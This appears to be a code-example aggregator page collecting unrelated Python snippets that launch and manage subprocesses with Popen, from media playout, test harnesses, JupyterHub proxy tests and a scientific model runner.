                        _text.textfile, _text.x, _text.y)
        ]

    try:
        if _playout.preview:
            # preview playout to player
            encoder = Popen([
                'ffplay', '-hide_banner', '-nostats', '-i', 'pipe:0'
                ] + overlay, stderr=None, stdin=PIPE, stdout=None)
        else:
            encoder = Popen([
                'ffmpeg', '-v', 'info', '-hide_banner', '-nostats',
                '-re', '-thread_queue_size', '256',
                '-i', 'pipe:0'] + overlay + _playout.post_comp_video
                + _playout.post_comp_audio + [
                    '-metadata', 'service_name=' + _playout.name,
                    '-metadata', 'service_provider=' + _playout.provider,
                    '-metadata', 'year={}'.format(year)
                ] + _playout.post_comp_extra + [_playout.out_addr], stdin=PIPE)

        if _playlist.mode and not stdin_args.folder:
            watcher = None
            get_source = GetSourceIter(encoder)
        else:
            logger.info("start folder mode")
            media = MediaStore()
            watcher = MediaWatcher(media)
            get_source = GetSource(media)

        try:
            for src_cmd in get_source.next():
                logger.debug('src_cmd: "{}"'.format(src_cmd))
                if src_cmd[0] == '-i':
                    current_file = src_cmd[1]
                else:
                    current_file = src_cmd[3]

                logger.info('play: "{}"'.format(current_file))

                with Popen([
                    'ffmpeg', '-v', 'error', '-hide_banner', '-nostats'
                    ] + src_cmd + ff_pre_settings,
                        stdout=PIPE) as decoder:
                    copyfileobj(decoder.stdout, encoder.stdin)

        except BrokenPipeError:
            logger.error('Broken Pipe!')
            terminate_processes(decoder, encoder, watcher)

        except SystemExit:
            logger.info("got close command")
            terminate_processes(decoder, encoder, watcher)

        except KeyboardInterrupt:
            logger.warning('program terminated')
            terminate_processes(decoder, encoder, watcher)

        # close encoder when nothing is to do anymore
        if encoder.poll() is None:
            encoder.terminate()

    finally:
        encoder.wait()
示例#32
0
class ServerRunner(BaseRunner):

    port = None
    notebook_dir = os.path.join(EIN_ROOT, "tests", "notebook")

    def __enter__(self):
        self.run()
        return self.port

    def __exit__(self, type, value, traceback):
        self.stop()

    def do_run(self):
        self.clear_notebook_dir()
        self.start()
        self.get_port()
        print("Server running at", self.port)

    def clear_notebook_dir(self):
        files = glob.glob(os.path.join(self.notebook_dir, '*.ipynb'))
        list(map(os.remove, files))
        print("Removed {0} ipynb files".format(len(files)))

    @staticmethod
    def _parse_port_line(line):
        port = line.strip().rsplit(':', 1)[-1].strip('/')
        return port

    def get_port(self):
        if self.port is None:
            val = self.proc.stdout.readline()
            dval = val.decode('utf-8')
            self.port = self._parse_port_line(dval)
        return self.port

    def start(self):
        from subprocess import Popen, PIPE, STDOUT
        self.proc = Popen(self.command,
                          stdout=PIPE,
                          stderr=STDOUT,
                          stdin=PIPE,
                          shell=True)
        # Answer "y" to the prompt: Shutdown Notebook Server (y/[n])?
        self.proc.stdin.write(b'y\n')

    def stop(self):
        print("Stopping server", self.port)
        returncode = self.proc.poll()
        if returncode is not None:
            logpath = self.logpath('server')
            print("Server process was already dead by exit code", returncode)
            print("*" * 50)
            print("Showing {0}:".format(logpath))
            print(open(logpath).read())
            print()
            return
        if not self.dry_run:
            try:
                kill_subprocesses(self.proc.pid, lambda x: 'ipython' in x)
            finally:
                self.proc.terminate()

    @property
    def command(self):
        fmtdata = dict(
            notebook_dir=self.notebook_dir,
            ipython=self.ipython,
            server_log=self.logpath('server'),
        )
        return self.command_template.format(**fmtdata)

    command_template = r"""{ipython} notebook --notebook-dir {notebook_dir} --no-browser --debug 2>&1 | tee {server_log} | grep --line-buffered 'Notebook is running at' | head -n1"""
示例#33
0
class Service:
    def __init__(
        self,
        args,
        *,
        name=None,
        env=None,
        timeout=5,
        poll_interval=0.2,
        process_settings=None,
    ):
        self.args = args
        self.name = name
        self.env = env
        self.timeout = timeout
        self.poll_interval = poll_interval
        self.process = None
        self._process_settings = process_settings

        if self._process_settings is None:
            self._process_settings = {}

    def start(self):
        """Starts the service and wait for it to be up """
        if self.process:
            raise ServiceAlreadyStarted
        self.process = Popen(self.args, env=self.env, **self._process_settings)
        try:
            self._wait_for_up()
            return self.process
        except TimeoutException:
            self.terminate()
            raise

    def is_up(self):
        """Determine if the service is up"""
        return True

    def _wait_for_up(self):
        with Timer(self.timeout) as timer:
            while True:
                is_up = self.is_up()

                if not is_up:
                    if timer.is_timed_out():
                        raise TimeoutException(
                            f"Service {self.name} did not report to be up after {self.timeout} seconds"
                        )
                    else:
                        time.sleep(min(self.poll_interval, timer.time_left))
                else:
                    break

    def terminate(self):
        if self.process is None:
            return
        try:
            self.process.terminate()
            self.process.wait(timeout=5)
        except subprocess.TimeoutExpired:
            warnings.warn(
                f"{self.name} did not terminate in time and had to be killed")
            self.process.kill()
            self.process.wait(timeout=5)
        self.process = None
示例#34
0
文件: test_shell.py 项目: xl-w/pyvisa
class TestVisaShell(BaseTestCase):
    """Test the VISA shell.

    """
    def setUp(self):
        """Start the shell in a subprocess.

        """
        os.environ["COVERAGE_PROCESS_START"] = ".coveragerc"
        self.shell = Popen(["pyvisa-shell"], stdin=PIPE, stdout=PIPE)
        self.reader = SubprocessOutputPoller(self.shell)
        self.reader.data_ready.wait(1)
        self.reader.get_lines()

    def open_resource(self):
        lines = self.communicate(
            f"open {list(RESOURCE_ADDRESSES.values())[0]}")
        self.assertIn(b"has been opened.", lines[0])

    def communicate(self, msg):
        """Write a message on stdin and collect the answer.

        """
        self.shell.stdin.write(msg.encode("ascii") + b"\n")
        self.shell.stdin.flush()
        self.reader.data_ready.wait(1)
        return self.reader.get_lines()

    def tearDown(self):
        if self.shell:
            self.shell.stdin.write(b"exit\n")
            self.shell.stdin.flush()
            self.shell.stdin.close()
            self.shell.terminate()
            self.shell.wait(0.1)
            self.reader.shutdown()

    def test_complete_open(self):
        """Test providing auto-completion for open.

        """
        shell = VisaShell()
        completions = shell.complete_open("TCPIP", 0, 0, 0)
        self.assertIn(to_canonical_name(RESOURCE_ADDRESSES["TCPIP::INSTR"]),
                      completions)

        # Test getting an alias from the completion
        completions = shell.complete_open("tcp", 0, 0, 0)
        self.assertIn("tcpip", completions)

    def test_list(self):
        """Test listing the connected resources.

        """
        lines = self.communicate("list")

        msg = []
        for i, rsc in enumerate(RESOURCE_ADDRESSES.values()):
            msg.append(f"({i:2d}) {to_canonical_name(rsc)}")
            if rsc in ALIASES:
                msg.append(f"     alias: {ALIASES[rsc]}")

        for line, m in zip(lines, msg):
            self.assertIn(m.encode("ascii"), line)

    # TODO fix argument handling to allow filtering

    def test_list_handle_error(self):
        """Test handling an error in listing resources.

        """
        shell = VisaShell()
        shell.resource_manager = None
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_list("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_open_no_args(self):
        """Test opening without any argument.

        """
        lines = self.communicate("open")
        self.assertIn(b"A resource name must be specified.", lines[0])

    def test_open_by_number(self):
        """Test opening based on the index of the resource.

        """
        lines = self.communicate("open 0")
        self.assertIn(b'Not a valid resource number. Use the command "list".',
                      lines[0])

        lines = self.communicate("list")
        lines = self.communicate("open 0")
        rsc = list(RESOURCE_ADDRESSES.values())[0]
        self.assertIn(
            f"{to_canonical_name(rsc)} has been opened.".encode("ascii"),
            lines[0])

        lines = self.communicate("open 0")
        self.assertIn(
            (b"You can only open one resource at a time. "
             b"Please close the current one first."),
            lines[0],
        )

    def test_open_by_address(self):
        """Test opening based on the resource address.

        """
        rsc = list(RESOURCE_ADDRESSES.values())[0]
        lines = self.communicate(f"open {rsc}")
        self.assertIn(f"{rsc} has been opened.".encode("ascii"), lines[0])

    def test_open_handle_exception(self):
        """Test handling an exception during opening.

        """
        lines = self.communicate('open ""')
        self.assertIn(b"VI_ERROR_INV_RSRC_NAME", lines[0])

    def test_handle_double_open(self):
        """Test handling before closing resource.

        """
        rsc = list(RESOURCE_ADDRESSES.values())[0]
        lines = self.communicate(f"open {rsc}")
        lines = self.communicate(f"open {rsc}")
        self.assertIn(
            (b"You can only open one resource at a time. "
             b"Please close the current one first."),
            lines[0],
        )

    def test_command_on_closed_resource(self):
        """Test all the commands that cannot be run without opening a resource.

        """
        for cmd in ("close", "write", "read", "query", "termchar", "timeout",
                    "attr"):
            lines = self.communicate(cmd)
            self.assertIn(
                b'There are no resources in use. Use the command "open".',
                lines[0])

    def test_close(self):
        """Test closing a resource.

        """
        rsc = list(RESOURCE_ADDRESSES.values())[0]
        lines = self.communicate(f"open {rsc}")
        self.assertIn(b"has been opened.", lines[0])
        lines = self.communicate("close")
        self.assertIn(b"The resource has been closed.", lines[0])

        lines = self.communicate(f"open {rsc}")
        self.assertIn(b"has been opened.", lines[0])

    def test_close_handle_error(self):
        """Test handling an error while closing.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_close("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_query(self):
        """querying a value from the instrument.

        """
        self.open_resource()
        lines = self.communicate("query *IDN?")
        self.assertIn(b"Response:", lines[0])

    def test_query_handle_error(self):
        """Test handling an error in query.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_query("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_read_write(self):
        """Test writing/reading values from the resource.

        """
        self.open_resource()
        lines = self.communicate("write *IDN?")
        lines = self.communicate("read")
        self.assertIn(b"Keysight ", lines[0])

    def test_read_handle_error(self):
        """Test handling an error in read.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_read("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_write_handle_error(self):
        """Test handling an error in write.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_write("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_timeout_get(self):
        """Test accessing the timeout.

        """
        self.open_resource()
        lines = self.communicate("timeout")
        self.assertIn(b"Timeout: ", lines[0])

    def test_timeout_get_handle_error(self):
        """Test handling an error in getting teh timeout.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_timeout("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_timeout_set(self):
        """Test setting the timeout.

        """
        self.open_resource()
        lines = self.communicate("timeout 1000")
        self.assertIn(b"Done", lines[0])
        lines = self.communicate("timeout")
        self.assertIn(b"Timeout: 1000ms", lines[0])

    def test_timeout_set_handle_error(self):
        """Test handling an error in setting the timeout

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_timeout("1000")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_print_attr_list(self):
        """Test printing attribute list.

        """
        class FalseResource:
            @classmethod
            def get_visa_attribute(cls, id):
                if id == constants.VI_ATTR_TMO_VALUE:
                    raise errors.VisaIOError(constants.VI_ERROR_NSUP_ATTR)
                elif id == constants.VI_ATTR_INTF_NUM:
                    raise Exception("Long text: aaaaaaaaaaaaaaaaaaaa")
                else:
                    raise Exception("Test")

        FalseResource.visa_attributes_classes = Resource.visa_attributes_classes

        shell = VisaShell()
        shell.current = FalseResource

        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.print_attribute_list()

        output = temp_stdout.getvalue()
        self.assertIn("Long text:...", output)

    def test_attr_no_args(self):
        """Test getting the list of attributes

        """
        self.open_resource()
        lines = self.communicate("attr")
        self.assertIn(b"VISA name", lines[1])

    def test_attr_too_many_args(self):
        """Test handling wrong args to attr.

        """
        self.open_resource()
        lines = self.communicate("attr 1 2 3")
        self.assertIn(
            b"Invalid syntax, use `attr <name>` to get;"
            b" or `attr <name> <value>` to set",
            lines[0],
        )

    def test_issue_in_getting_attr(self):
        """Test handling exception in getting an attribute.

        """
        shell = VisaShell()
        shell.do_open(list(RESOURCE_ADDRESSES.values())[0])

        def broken_get_visa_attribute(self, name=""):
            raise Exception("Exception")

        # Issue on VI_
        old = Resource.get_visa_attribute
        Resource.get_visa_attribute = broken_get_visa_attribute
        try:
            temp_stdout = StringIO()
            with redirect_stdout(temp_stdout):
                try:
                    shell.do_attr("VI_ATTR_TERMCHAR")
                finally:
                    Resource.get_visa_attribute = old
            output = temp_stdout.getvalue()
            self.assertIn("Exception", output)
        finally:
            Resource.get_visa_attribute = old

        # Issue on aliased attr
        old = type(shell.current).allow_dma
        type(shell.current).allow_dma = property(broken_get_visa_attribute)
        try:
            temp_stdout = StringIO()
            with redirect_stdout(temp_stdout):
                shell.do_attr("allow_dma")
            output = temp_stdout.getvalue()
            self.assertIn("Exception", output)
        finally:
            type(shell.current).allow_dma = old

    def test_attr_get_set_by_VI_non_boolean(self):
        """Test getting/setting an attr using the VI_ name (int value)

        """
        self.open_resource()
        msg = "attr VI_ATTR_TERMCHAR {}".format(ord("\r"))
        lines = self.communicate(msg)
        self.assertIn(b"Done", lines[0])

        lines = self.communicate("attr VI_ATTR_TERMCHAR")
        self.assertIn(str(ord("\r")), lines[0].decode("ascii"))

    def test_attr_get_set_by_VI_boolean(self):
        """Test getting/setting an attr using the VI_ name (bool value)

        """
        self.open_resource()
        for v in (False, True):
            msg = f"attr VI_ATTR_TERMCHAR_EN {v}"
            lines = self.communicate(msg)
            self.assertIn(b"Done", lines[0])

            lines = self.communicate("attr VI_ATTR_TERMCHAR_EN")
            self.assertIn(str(int(v)).encode("ascii"), lines[0])

    def test_attr_get_by_VI_handle_error(self):
        """Test accessing an attr by an unknown VI name.

        """
        self.open_resource()
        lines = self.communicate("attr VI_test")
        self.assertIn(b"no attribute", lines[0])

    def test_attr_get_by_name(self):
        """Test accessing an attr by Python name.

        """
        self.open_resource()
        lines = self.communicate("attr allow_dma")
        self.assertTrue(b"True" in lines[0] or b"False" in lines[0])

    def test_attr_get_by_name_handle_error(self):
        """Test accessing an attr by an unknown Python name.

        """
        self.open_resource()
        lines = self.communicate("attr test")
        self.assertIn(b"no attribute", lines[0])

    def test_attr_set_by_VI_handle_error_unknown_attr(self):
        """Test handling issue in setting VI attr which does not exist.

        """
        self.open_resource()
        lines = self.communicate("attr VI_test test")
        self.assertIn(b"no attribute", lines[0])

    def test_attr_set_by_VI_handle_error_non_boolean(self):
        """Test handling issue in setting VI attr. (non boolean value)

        """
        self.open_resource()
        msg = "attr VI_ATTR_TERMCHAR_EN Test"
        lines = self.communicate(msg)
        self.assertIn(b"Error", lines[0])

    def test_attr_set_by_VI_handle_error_non_interger(self):
        """Test handling issue in setting VI attr. (non integer value)

        """
        self.open_resource()
        msg = "attr VI_ATTR_TERMCHAR Test"
        lines = self.communicate(msg)
        self.assertIn(b"Error", lines[0])

    def test_attr_set_by_VI_handle_error_wrong_value(self):
        """Test handling issue in setting VI attr by name. (wrong value)

        """
        self.open_resource()
        msg = "attr VI_ATTR_TERMCHAR -1"
        lines = self.communicate(msg)
        self.assertIn(b"VI_ERROR_NSUP_ATTR_STATE", lines[0])

    def test_attr_set_by_name_handle_error(self):
        """Test handling attempt to set attr by name (which is not supported).

        """
        self.open_resource()
        msg = "attr allow_dma Test"
        lines = self.communicate(msg)
        self.assertIn(
            b"Setting Resource Attributes by python name is not yet "
            b"supported.",
            lines[0],
        )

    def test_complete_attr(self):
        """Test providing auto-completion for attrs.

        """
        shell = VisaShell()
        shell.do_open(list(RESOURCE_ADDRESSES.values())[0])
        completions = shell.complete_attr("VI_ATTR_TERM", 0, 0, 0)
        self.assertIn("VI_ATTR_TERMCHAR", completions)
        self.assertIn("VI_ATTR_TERMCHAR_EN", completions)

        completions = shell.complete_attr("allow_d", 0, 0, 0)
        self.assertIn("allow_dma", completions)

    def test_termchar_get_handle_error(self):
        """Test handling error when getting the termchars.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_termchar("")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_getting_termchar_absent_mapping(self):
        """Test getting a termchar that does not map to something with a representation.

        """
        shell = VisaShell()
        shell.do_open(list(RESOURCE_ADDRESSES.values())[0])
        shell.current.read_termination = "X"
        shell.current.write_termination = "Z"
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_termchar("")
        output = temp_stdout.getvalue()
        self.assertSequenceEqual("Termchar read: X write: Z",
                                 output.split("\n")[0])

    def test_termchar_get_set_both_identical(self):
        """Test setting both termchars to the same value.

        """
        self.open_resource()
        lines = self.communicate("termchar CR")
        self.assertIn(b"Done", lines[0])

        lines = self.communicate("termchar")
        self.assertIn(b"Termchar read: CR write: CR", lines[0])

    def test_termchar_get_set_both_different(self):
        """Test setting both termchars to different values.

        """
        self.open_resource()
        lines = self.communicate("termchar CR NUL")
        self.assertIn(b"Done", lines[0])

        lines = self.communicate("termchar")
        self.assertIn(b"Termchar read: CR write: NUL", lines[0])

    def test_termchar_set_too_many_args(self):
        """Test handling to many termchars to termchar.

        """
        self.open_resource()
        lines = self.communicate("termchar 1 2 3")
        self.assertIn(b"Invalid syntax", lines[0])

    def test_termchar_set_handle_error_wrong_value(self):
        """Test handling wrong value in setting termchar.

        """
        self.open_resource()
        lines = self.communicate("termchar tt")
        self.assertIn(b"use CR, LF, CRLF, NUL or None to set termchar",
                      lines[0])

    def test_termchar_set_handle_error(self):
        """Test handling an error in setting the termchars.

        """
        shell = VisaShell()
        shell.current = True
        temp_stdout = StringIO()
        with redirect_stdout(temp_stdout):
            shell.do_termchar("CR")
        output = temp_stdout.getvalue()
        self.assertIn("no attribute", output)

    def test_eof(self):
        """Test handling an EOF.

        """
        shell = VisaShell()
        self.assertTrue(shell.do_EOF(None))
示例#35
0
    def _run_sub(self, cmd, queue):
        """
        Run a command in a subprocess.
        """
        try:
            add_queue_to_env(queue)

            if self.nocapture:
                out = sys.stdout
            else:
                out = open(os.devnull, 'w')

            errfd, tmperr = mkstemp()
            err = os.fdopen(errfd, 'w')

            p = Popen(cmd,
                      stdout=out,
                      stderr=err,
                      env=os.environ,
                      universal_newlines=True)  # text mode
            count = 0
            timedout = False

            if self.timeout < 0.0:  # infinite timeout
                p.wait()
            else:
                poll_interval = 0.2
                while p.poll() is None:
                    if count * poll_interval > self.timeout:
                        p.terminate()
                        timedout = True
                        break
                    time.sleep(poll_interval)
                    count += 1

            err.close()

            with open(tmperr, 'r') as f:
                errmsg = f.read()
            os.remove(tmperr)

            os.environ['TESTFLO_QUEUE'] = ''

            if timedout:
                result = self
                self.status = 'FAIL'
                self.err_msg = 'TIMEOUT after %s sec. ' % self.timeout
                if errmsg:
                    self.err_msg += errmsg
            else:
                if p.returncode != 0:
                    print(errmsg)
                result = queue.get()
        except:
            # we generally shouldn't get here, but just in case,
            # handle it so that the main process doesn't hang at the
            # end when it tries to join all of the concurrent processes.
            self.status = 'FAIL'
            self.err_msg = traceback.format_exc()
            result = self

            err.close()
        finally:
            if not self.nocapture:
                out.close()
            sys.stdout.flush()
            sys.stderr.flush()

        return result
示例#36
0
def run_shell_command(command, use_shell=False, use_shlex=True, my_cwd=None,
                      my_env=None, stdout_logfile=None, stderr_logfile=None, stdin=None, my_timeout=24 * 60 * 60):
    """Run the given command as a shell and get the return code, stdout and stderr
        Returns True/False and return code.
    """
    from subprocess import PIPE, Popen

    if stdin is not None:
        stdin = stdin.encode('utf-8')

    if use_shlex:
        import shlex
        myargs = shlex.split(str(command))
        LOGGER.debug('Command sequence= ' + str(myargs))
    else:
        myargs = command

    try:
        proc = Popen(myargs,
                     cwd=my_cwd, shell=use_shell, env=my_env,
                     stderr=PIPE, stdout=PIPE, stdin=PIPE, close_fds=True)

        LOGGER.debug("Process pid: {}".format(proc.pid))
    except OSError as e:
        LOGGER.error("Popen failed for command: {} with {}".format(myargs, e))
        return False
    except ValueError:
        LOGGER.error("Popen called with invalid arguments.")
        return False
    except:
        LOGGER.error("Popen failed for an unknown reason.")
        return False

    import signal

    class Alarm(Exception):
        pass

    def alarm_handler(signum, frame):
        raise Alarm

    signal.signal(signal.SIGALRM, alarm_handler)
    signal.alarm(my_timeout)
    try:
        LOGGER.debug("Before call to communicate:")
        if stdin is None:
            out, err = proc.communicate()
        else:
            out, err = proc.communicate(input=stdin)

        out = out.decode('utf-8')
        err = err.decode('utf-8')

        return_value = proc.returncode
        signal.alarm(0)
    except Alarm:
        LOGGER.error(
            "Command: {} took to long time(more than {}s) to complete. Terminates the job.".format(command, my_timeout))
        proc.terminate()
        return False

    LOGGER.debug("communicate complete")
    lines = out.splitlines()
    if stdout_logfile is None:
        for line in lines:
            LOGGER.debug(line)
    else:
        try:
            _stdout = open(stdout_logfile, 'w')
            for line in lines:
                _stdout.write(line + "\n")
            _stdout.close()
        except IOError as e:
            LOGGER.error("IO operation to file stdout_logfile: {} failed with {}".format(stdout_logfile, e))
            return False

    errlines = err.splitlines()
    if stderr_logfile is None:
        for errline in errlines:
            LOGGER.debug(errline)
    else:
        try:
            _stderr = open(stderr_logfile, 'w')
            for errline in errlines:
                _stderr.write(errline + "\n")
            _stderr.close()
        except IOError as e:
            LOGGER.error("IO operation to file stderr_logfile: {} failed with {}".format(stderr_logfile, e))
            return False

    return True, return_value, out, err
示例#37
0
    def run(cls,
            request,
            process_type,
            bat_file,
            cancer_rates="UK",
            cwd="/tmp",
            niceness=0,
            name="",
            model=settings.BC_MODEL):
        """
        Run a process.
        @param request: HTTP request
        @param process_type: either pedigree.MUTATION_PROBS or pedigree.CANCER_RISKS.
        @param bat_file: batch file path
        @keyword cancer_rates: cancer incidence rates used in risk calculation
        @keyword cwd: working directory
        @keyword niceness: niceness value
        @keyword name: log name for calculation, e.g. REMAINING LIFETIME
        """
        if process_type == pedigree.MUTATION_PROBS:
            prog = os.path.join(model['HOME'], model['PROBS_EXE'])
            out = "can_probs"
        else:
            prog = os.path.join(model['HOME'], model['RISKS_EXE'])
            out = "can_risks"

        start = time.time()
        try:
            try:
                os.remove(os.path.join(
                    cwd, out + ".out"))  # ensure output file doesn't exist
            except OSError:
                pass

            # logger.debug(prog + ' -r ' + out+".out -v " + bat_file + " " +
            #              os.path.join(model['HOME'], "Data/incidence_rates_" + cancer_rates + ".nml"))
            process = Popen(
                [
                    prog,
                    '-r',
                    out + ".out",  # results file
                    '-v',  # include model version
                    bat_file,
                    os.path.join(
                        model['HOME'],
                        "Data/incidence_rates_" + cancer_rates + ".nml")
                ],
                cwd=cwd,
                stdout=PIPE,
                stderr=PIPE,
                env=settings.FORTRAN_ENV,
                preexec_fn=lambda: os.nice(niceness) and resource.setrlimit(
                    resource.RLIMIT_STACK,
                    (resource.RLIM_INFINITY, resource.RLIM_INFINITY)))

            (outs, errs) = process.communicate(
                timeout=settings.FORTRAN_TIMEOUT)  # timeout in seconds
            exit_code = process.wait()

            if exit_code == 0:
                with open(os.path.join(cwd, out + ".out"), 'r') as result_file:
                    data = result_file.read()
                logger.info(
                    model.get('NAME', "") + " " +
                    ("MUTATION PROBABILITY" if process_type ==
                     pedigree.MUTATION_PROBS else "RISK ") + name +
                    " CALCULATION: user="******"; elapsed time=" + str(time.time() - start))
                return data
            else:
                logger.error("EXIT CODE (" + out.replace('can_', '') + "): " +
                             str(exit_code))
                logger.error(outs)
                errs = errs.decode("utf-8").replace('\n', '')
                logger.error(errs)
                raise ModelError(errs)
        except TimeoutExpired as to:
            process.terminate()
            logger.error(model.get('NAME', "") + " PROCESS TIMED OUT.")
            logger.error(to)
            raise TimeOutException()
        except Exception as e:
            logger.error(model.get('NAME', "") + ' PROCESS EXCEPTION: ' + cwd)
            logger.error(e)
            raise
示例#38
0
def test_external_proxy(request, io_loop):
    """Test a proxy started before the Hub"""
    auth_token = 'secret!'
    proxy_ip = '127.0.0.1'
    proxy_port = 54321

    app = MockHub.instance(
        proxy_api_ip=proxy_ip,
        proxy_api_port=proxy_port,
        proxy_auth_token=auth_token,
    )

    def fin():
        MockHub.clear_instance()
        app.stop()

    request.addfinalizer(fin)
    env = os.environ.copy()
    env['CONFIGPROXY_AUTH_TOKEN'] = auth_token
    cmd = app.proxy_cmd + [
        '--ip',
        app.ip,
        '--port',
        str(app.port),
        '--api-ip',
        proxy_ip,
        '--api-port',
        str(proxy_port),
        '--default-target',
        'http://%s:%i' % (app.hub_ip, app.hub_port),
    ]
    proxy = Popen(cmd, env=env)

    def _cleanup_proxy():
        if proxy.poll() is None:
            proxy.terminate()

    request.addfinalizer(_cleanup_proxy)

    def wait_for_proxy():
        io_loop.run_sync(lambda: wait_for_http_server('http://%s:%i' %
                                                      (proxy_ip, proxy_port)))

    wait_for_proxy()

    app.start([])

    assert app.proxy_process is None

    routes = io_loop.run_sync(app.proxy.get_routes)
    assert list(routes.keys()) == ['/']

    # add user
    name = 'river'
    r = api_request(app, 'users', name, method='post')
    r.raise_for_status()
    r = api_request(app, 'users', name, 'server', method='post')
    r.raise_for_status()

    routes = io_loop.run_sync(app.proxy.get_routes)
    assert sorted(routes.keys()) == ['/', '/user/river']

    # teardown the proxy and start a new one in the same place
    proxy.terminate()
    proxy = Popen(cmd, env=env)
    wait_for_proxy()

    routes = io_loop.run_sync(app.proxy.get_routes)
    assert list(routes.keys()) == ['/']

    # poke the server to update the proxy
    r = api_request(app, 'proxy', method='post')
    r.raise_for_status()

    # check that the routes are correct
    routes = io_loop.run_sync(app.proxy.get_routes)
    assert sorted(routes.keys()) == ['/', '/user/river']

    # teardown the proxy again, and start a new one with different auth and port
    proxy.terminate()
    new_auth_token = 'different!'
    env['CONFIGPROXY_AUTH_TOKEN'] = new_auth_token
    proxy_port = 55432
    cmd = app.proxy_cmd + [
        '--ip',
        app.ip,
        '--port',
        str(app.port),
        '--api-ip',
        app.proxy_api_ip,
        '--api-port',
        str(proxy_port),
        '--default-target',
        'http://%s:%i' % (app.hub_ip, app.hub_port),
    ]

    proxy = Popen(cmd, env=env)
    wait_for_proxy()

    # tell the hub where the new proxy is
    r = api_request(app,
                    'proxy',
                    method='patch',
                    data=json.dumps({
                        'port': proxy_port,
                        'auth_token': new_auth_token,
                    }))
    r.raise_for_status()
    assert app.proxy.api_server.port == proxy_port

    # get updated auth token from main thread
    def get_app_proxy_token():
        q = Queue()
        app.io_loop.add_callback(lambda: q.put(app.proxy.auth_token))
        return q.get(timeout=2)

    assert get_app_proxy_token() == new_auth_token
    app.proxy.auth_token = new_auth_token

    # check that the routes are correct
    routes = io_loop.run_sync(app.proxy.get_routes)
    assert sorted(routes.keys()) == ['/', '/user/river']
示例#39
0
    def _evaluate_model(self):

        logger.info("Started Validation: ")
        val_start_time = time.time()
        mb_subprocess = Popen(self.multibleu_cmd, stdin=PIPE, stdout=PIPE)
        total_cost = 0.0

        # Get target vocabulary
        if not self.trg_ivocab:
            sources = self._get_attr_rec(self.main_loop, 'data_stream')
            trg_vocab = sources.data_streams[1].dataset.dictionary
            self.trg_ivocab = {v: k for k, v in trg_vocab.items()}

        if self.verbose:
            ftrans = open(self.config['val_set_out'], 'w')

        for i, line in enumerate(self.data_stream.get_epoch_iterator()):
            """
            Load the sentence, retrieve the sample, write to file
            """

            seq = self._oov_to_unk(line[0], self.config['src_vocab_size'],
                                   self.unk_idx)
            input_ = numpy.tile(seq, (self.config['beam_size'], 1))

            # draw sample, checking to ensure we don't get an empty string back
            trans, costs = \
                self.beam_search.search(
                    input_values={self.source_sentence: input_},
                    max_length=3*len(seq), eol_symbol=self.eos_idx,
                    ignore_first_eol=True)

            # normalize costs according to the sequence lengths
            if self.normalize:
                lengths = numpy.array([len(s) for s in trans])
                costs = costs / lengths

            nbest_idx = numpy.argsort(costs)[:self.n_best]
            for j, best in enumerate(nbest_idx):
                try:
                    total_cost += costs[best]
                    trans_out = trans[best]

                    # convert idx to words
                    trans_out = self._idx_to_word(trans_out, self.trg_ivocab)

                except ValueError:
                    logger.info(
                        "Can NOT find a translation for line: {}".format(i +
                                                                         1))
                    trans_out = '<UNK>'

                if j == 0:
                    # Write to subprocess and file if it exists
                    print(trans_out, file=mb_subprocess.stdin)
                    if self.verbose:
                        print(trans_out, file=ftrans)

            if i != 0 and i % 100 == 0:
                logger.info(
                    "Translated {} lines of validation set...".format(i))

            mb_subprocess.stdin.flush()

        logger.info("Total cost of the validation: {}".format(total_cost))
        self.data_stream.reset()
        if self.verbose:
            ftrans.close()

        # send end of file, read output.
        mb_subprocess.stdin.close()
        stdout = mb_subprocess.stdout.readline()
        logger.info(stdout)
        out_parse = re.match(r'BLEU = [-.0-9]+', stdout)
        logger.info("Validation Took: {} minutes".format(
            float(time.time() - val_start_time) / 60.))
        assert out_parse is not None

        # extract the score
        bleu_score = float(out_parse.group()[6:])
        self.val_bleu_curve.append(bleu_score)
        logger.info(bleu_score)
        mb_subprocess.terminate()

        return bleu_score
示例#40
0
class Nebulae(object):
    def __init__(self):
        if neb_globals.remount_fs is False:
            print("Nebulae is operating in \"Read/Write\" mode.")
            print("Filesystem will not be remounted during operation.")
            os.system("/home/alarm/QB_Nebulae_V2/Code/scripts/mountfs.sh rw")
        print "Nebulae Initializing"
        self.instr_cfg = cfg_path + "bootinstr.txt"
        self.orc_handle = conductor.Conductor(
        )  # Initialize Audio File Tables and Csound Score/Orchestra
        #self.currentInstr = "a_granularlooper"
        self.c = None
        self.pt = None
        self.ui = None
        self.c_handle = None
        self.led_process = None
        self.log = logger.NebLogger()
        # Check the config file for last instr
        if os.path.isfile(
                self.instr_cfg) and os.path.getsize(self.instr_cfg) > 0:
            # Get bank/instr from factory
            with open(self.instr_cfg, 'rb') as f:
                print "Reading bootinstr.txt"
                for line in f:
                    templist = line.strip().split(',')
                    if templist[0] == 'bank':
                        self.new_bank = templist[1]
                    elif templist[0] == 'instr':
                        self.new_instr = templist[1]
        else:
            self.new_bank = 'factory'
            self.new_instr = 'a_granularlooper'
